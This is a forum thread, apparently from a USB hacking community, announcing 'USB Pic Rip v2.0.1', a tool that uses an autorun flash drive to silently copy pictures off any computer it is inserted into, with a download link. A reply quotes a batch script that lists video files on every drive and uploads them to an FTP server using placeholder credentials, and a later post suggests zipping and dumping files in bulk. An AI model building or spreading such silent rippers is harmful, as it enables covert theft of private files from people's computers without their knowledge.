Jump to content

USB Pic Rip v2.0.1


M0XIE

Recommended Posts

picrip.jpg

Throw all other versions out the window; honestly who needs them.

Change Log:

Various changes in the code to run faster.

Bat scripts have been compiled into .exe's.

And an Autorun maker has been added for USB Pic Rip.

The main executable and the archive executable runs silently.

Come wrapped up in a nice little installer so you can't *censored* it up.

Installation:

Run the install.

How to configure:

Run the Autorun.exe located in the root of your flash drive.

How to Run

After you run the Autorun.exe simply remove and reinsert your flash drive anywhere.

Download:

http://rapidshare.com/files/56244160/USB_Pic_Rip.exe

Link to comment
Share on other sites

I do applaud the fact that you've asked for help *and* written up what you've been told.
yeah how the hell is this new ?

people have been asking for it on numerous occasions, and a lot of people (including me in i think the main switchblade or hacksaw topic) have then replied with a batch script code to do that ....

appart from the way it's written its the same old trick ....

nothin new ....

why post ?

Link to comment
Share on other sites

I do applaud the fact that you've asked for help *and* written up what you've been told.

yeah how the hell is this new ?

people have been asking for it on numerous occasions, and a lot of people (including me in i think the main switchblade or hacksaw topic) have then replied with a batch script code to do that ....

appart from the way it's written its the same old trick ....

nothin new ....

why post ?

*Clears throte

First off in the first 23 pages of the USB Switchblade Development thread the word or combination of letters "jpg" was used once as follows:

7. record email, .xls, .qdb, .mny, .doc, .qdf, .eml, & .jpg from computer

This was merely a concept. Not a working picture ripper.

The word or combination of letters "jpg" then does not show up until page 24 in which again the people of this forum only talk about it in concept, still not a picture ripper only concept. The preceding posts do not talk about any ripping of files either.

Further more scattered throughout this entire forum are posts of people asking for a program or or how to do this. The closest thing to an actual ripper was posted by you it is as followed:

@echo off
color 0a
echo.
echo DVDrip-INDEXER  by DLSS
echo ------------------------------
echo %cd%
echo.

set file=%COMPUTERNAME%-%USERNAME%
set save=savelocation-(location-of-script)
set ftp-server=ftp.yourserver.com
set ftp-user=yourusername
set ftp-pass=yourpassword
echo %ftp-user% >> "%file%.ftp"
echo %ftp-pass% >> "%file%.ftp"
echo prompt off >> "%file%.ftp"

# problem ! i need to put mget "
# in front of each line and 
# " after each line ....

dir "C:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
dir "D:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
dir "E:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
dir "F:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
dir "G:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
dir "H:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
dir "I:/*DVDrip*.avi" /b /s >> "%save%/%file%.ftp"
# etc
cls
FTP -s:%file%.ftp %ftp-server%
exit

You even later wrote:

seriously advise against useing this method to dump files

Now let's stop and think for a moment. Your method copied them to an ftp, this copies it to a flash drive. A concept has been talked of about a picture ripper but no one has out right posted a working copy, anything said was merely chat. There are requests scattered across the forum asking for a program such as this, in the ones that I read, including the request that I made, people replied to just make it yourself. So there is no official or even unofficial file ripper that has been posted on this forum that copies files to a flash drive. This is a working well commented version of a file ripper made for ripping to flash drives.

And even if somewhere there is a batch file ripper that rips to a flash drive consider this, how many picture editing programs are there, how many different forum software types exist, how many different types of toppings can you put on a pizza? In your words when MSPaint was made they should have stopped, Photoshop does not deserver to be made.

So shut up site down and enjoy!

Link to comment
Share on other sites

  • 2 weeks later...
  • 5 months later...

Yeah, seriously...it's a trivial task to writer a better pic ripper anyway. An even better way is to integrate with a full-fledged file dumper. And how about ZIPping all the pics together? It's kinda tedious even for a batch script to FTP a gazillion files.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...